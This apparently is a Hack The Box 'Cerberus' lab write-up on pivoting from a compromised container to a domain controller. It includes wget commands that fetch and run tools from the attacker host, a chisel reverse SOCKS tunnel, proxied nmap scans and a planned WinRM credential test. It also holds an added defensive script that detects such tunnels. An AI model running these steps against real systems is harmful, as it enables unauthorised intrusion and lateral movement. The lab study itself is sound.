Pivoting


The container host, icinga.cerberus.local, has been fully compromised, and the post-compromise assessment yielded credentials for the matthew user and for the machine account.

root@icinga:/dev/shm# ifconfig | grep -w inet
        inet 172.16.22.2  netmask 255.255.255.240  broadcast 172.16.22.15
        inet 127.0.0.1  netmask 255.0.0.0
 
root@icinga:/dev/shm# arp -a
dc.cerberus.local (172.16.22.1) at 00:15:5d:5f:e8:00 [ether] on eth0
 
root@icinga:/dev/shm# ip route
default via 172.16.22.1 dev eth0 onlink 
172.16.22.0/28 dev eth0 proto kernel scope link src 172.16.22.2 

Considering the current container host’s network configuration, specifically its connection to the dc.cerberus.local host over the 172.16.22.0/28 network, establishing a tunnel is necessary to reach the internal NIC of the dc.cerberus.local host. I will be using chisel for this.

Reverse Socks Proxy


root@icinga:/dev/shm# wget -q http://10.10.14.4/chiselx64 ; chmod 755 /dev/shm/chiselx64

Delivery complete

┌──(kali㉿kali)-[~/archive/htb/labs/cerberus]
└─$ chisel server -p 55555 --reverse -v
2024/01/17 13:12:33 server: Reverse tunnelling enabled
2024/01/17 13:12:33 server: Fingerprint uoasuwy7df65gfzvAiwoSIqrOMsR8i6iVyGhNEHqa0A=
2024/01/17 13:12:33 server: Listening on http://0.0.0.0:55555

Starting a chisel server on the Kali port 55555

From Kali, I need to append the configured reverse SOCKS proxy to the bottom of the /etc/proxychains4.conf file. This configuration will allow me to reach the other internal hosts.

root@icinga:/dev/shm# ./chiselx64 client 10.10.14.4:55555 R:48823:socks &
[1] 21234
2024/01/17 12:14:53 client: Connecting to ws://10.10.14.4:55555
2024/01/17 12:14:53 client: Connected (Latency 27.0586ms)

The command above binds port 48823 of the icinga.cerberus.local host to Kali’s SOCKS proxy, effectively creating a reverse SOCKS proxy.

Connected. Now that a reverse SOCKS proxy has been established, I can reach any host that is reachable from the initial container (172.16.22.2).
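From the defender's side, the tunnel above leaves two visible traces on the pivot host: a binary executed out of /dev/shm, and an established connection from that binary to a peer outside the host's own 172.16.22.0/28 segment. The following script is an added example, not part of the original writeup, that runs that check over constructed `ss -tnp`-style lines and a constructed pid-to-executable map (the sample rows, pids and paths are made up for the demo; only the addresses and the chiselx64 name come from the page):

```python
import ipaddress
import re
from typing import Dict, List

# Directories that are memory-backed or world-writable; a long-lived network
# client executing from one of them is worth a look.
VOLATILE_DIRS = ("/dev/shm/", "/tmp/", "/var/tmp/")

# Matches the process column printed by `ss -tnp`, e.g. users:(("sshd",pid=812,fd=4))
PROC_RE = re.compile(r'users:\(\("(?P<name>[^"]+)",pid=(?P<pid>\d+),fd=\d+\)\)')

# Constructed sample in the shape of `ss -tnp` output (not captured from the box).
SAMPLE_SS = """\
State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
ESTAB 0 0 172.16.22.2:41822 10.10.14.4:55555 users:(("chiselx64",pid=21234,fd=7))
ESTAB 0 0 172.16.22.2:22 172.16.22.5:51004 users:(("sshd",pid=812,fd=4))
ESTAB 0 0 172.16.22.2:5665 172.16.22.1:49812 users:(("icinga2",pid=1311,fd=12))
"""

# Constructed pid -> resolved /proc/<pid>/exe path (hypothetical values).
SAMPLE_EXE: Dict[int, str] = {
    21234: "/dev/shm/chiselx64",
    812: "/usr/sbin/sshd",
    1311: "/usr/lib/icinga2/sbin/icinga2",
}


def parse_ss(ss_output: str) -> List[dict]:
    """Turn `ss -tnp` text into rows with peer address, port, process name and pid."""
    rows = []
    for line in ss_output.splitlines():
        parts = line.split()
        if len(parts) < 6 or parts[0] == "State":
            continue  # header or malformed line
        m = PROC_RE.search(line)
        if not m:
            continue  # socket without an owning process we can name
        peer_ip, peer_port = parts[4].rsplit(":", 1)
        rows.append({
            "state": parts[0],
            "local": parts[3],
            "peer_ip": peer_ip,
            "peer_port": int(peer_port),
            "name": m["name"],
            "pid": int(m["pid"]),
        })
    return rows


def find_suspicious(ss_output: str, exe_by_pid: Dict[int, str], local_nets: List[str]) -> List[dict]:
    """Flag sockets whose owning binary runs from a volatile directory or whose
    peer lies outside the host's own network segments. Returns one finding per
    row with the list of reasons that fired."""
    nets = [ipaddress.ip_network(n) for n in local_nets]
    findings = []
    for row in parse_ss(ss_output):
        reasons = []
        exe = exe_by_pid.get(row["pid"], "")
        if exe.startswith(VOLATILE_DIRS):
            reasons.append(f"executable lives in a volatile directory: {exe}")
        peer = ipaddress.ip_address(row["peer_ip"])
        if not any(peer in n for n in nets):
            reasons.append(f"peer {row['peer_ip']}:{row['peer_port']} is outside the local segments")
        if reasons:
            findings.append({**row, "exe": exe, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in find_suspicious(SAMPLE_SS, SAMPLE_EXE, ["172.16.22.0/28"]):
        print(f"pid {f['pid']} ({f['name']}): " + "; ".join(f["reasons"]))
```

On a real host the pid-to-path map comes from resolving /proc/<pid>/exe; the "outside local segments" reason on its own will fire for legitimate traffic that leaves through the gateway, so it is the combination with a volatile-directory binary (or an unexpected process name) that makes the row worth escalating.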

Scanning


┌──(kali㉿kali)-[~/archive/htb/labs/cerberus]
└─$ proxychains -q nmap 172.16.22.1          
starting nmap 7.94svn ( https://nmap.org ) at 2024-01-17 14:09 CET
stats: 0:02:00 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
connect scan timing: About 0.70% done
stats: 0:08:32 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
connect scan timing: About 3.30% done; ETC: 18:20 (4:02:44 remaining)
stats: 0:38:40 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
connect scan timing: About 15.30% done; ETC: 18:20 (3:32:46 remaining)
stats: 2:19:23 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
connect scan timing: About 55.40% done; ETC: 18:20 (1:52:01 remaining)
stats: 3:20:25 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
connect scan timing: About 79.70% done; ETC: 18:20 (0:50:59 remaining)
stats: 3:45:02 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
connect scan timing: About 89.50% done; ETC: 18:20 (0:26:22 remaining)

Despite the reverse SOCKS proxy, scanning is very slow: proxychains forces a TCP connect scan, and every one of the 65535 ports means a separate connection through the tunnel. I will opt for another approach.

root@icinga:/dev/shm# wget -q http://10.10.14.4/nmap ; chmod 755 /dev/shm/nmap

Uploading a statically compiled nmap to the icinga.cerberus.local host. This way it has no library dependencies and can scan the DC host directly.

root@icinga:/dev/shm# ./nmap -T4 -p- 172.16.22.1
starting nmap 6.49beta1 ( http://nmap.org ) at 2024-01-17 17:08 UTC
Unable to find nmap-services!  Resorting to /etc/services
Cannot find nmap-payloads. UDP payloads are disabled.
 
Nmap scan report for DC.cerberus.local (172.16.22.1)
cannot find nmap-mac-prefixes: Ethernet vendor correlation will not be performed
Host is up (-0.00064s latency).
not shown: 65534 filtered ports
PORT     STATE SERVICE
5985/tcp open  unknown
mac address: 00:15:5D:5F:E8:00 (Unknown)
 
nmap done: 1 IP address (1 host up) scanned in 1210.58 seconds

The WinRM service (5985/tcp) is up and running.

┌──(kali㉿kali)-[~/archive/htb/labs/cerberus]
└─$ proxychains -q nmap -Pn -p5985 172.16.22.1               
starting nmap 7.94svn ( https://nmap.org ) at 2024-01-17 17:51 CET
Nmap scan report for dc (172.16.22.1)
Host is up (0.086s latency).
 
PORT     STATE SERVICE
5985/tcp open  wsman
 
nmap done: 1 IP address (1 host up) scanned in 0.11 seconds

Confirmed from Kali via the reverse SOCKS proxy. I will test the matthew user’s credentials against the WinRM service.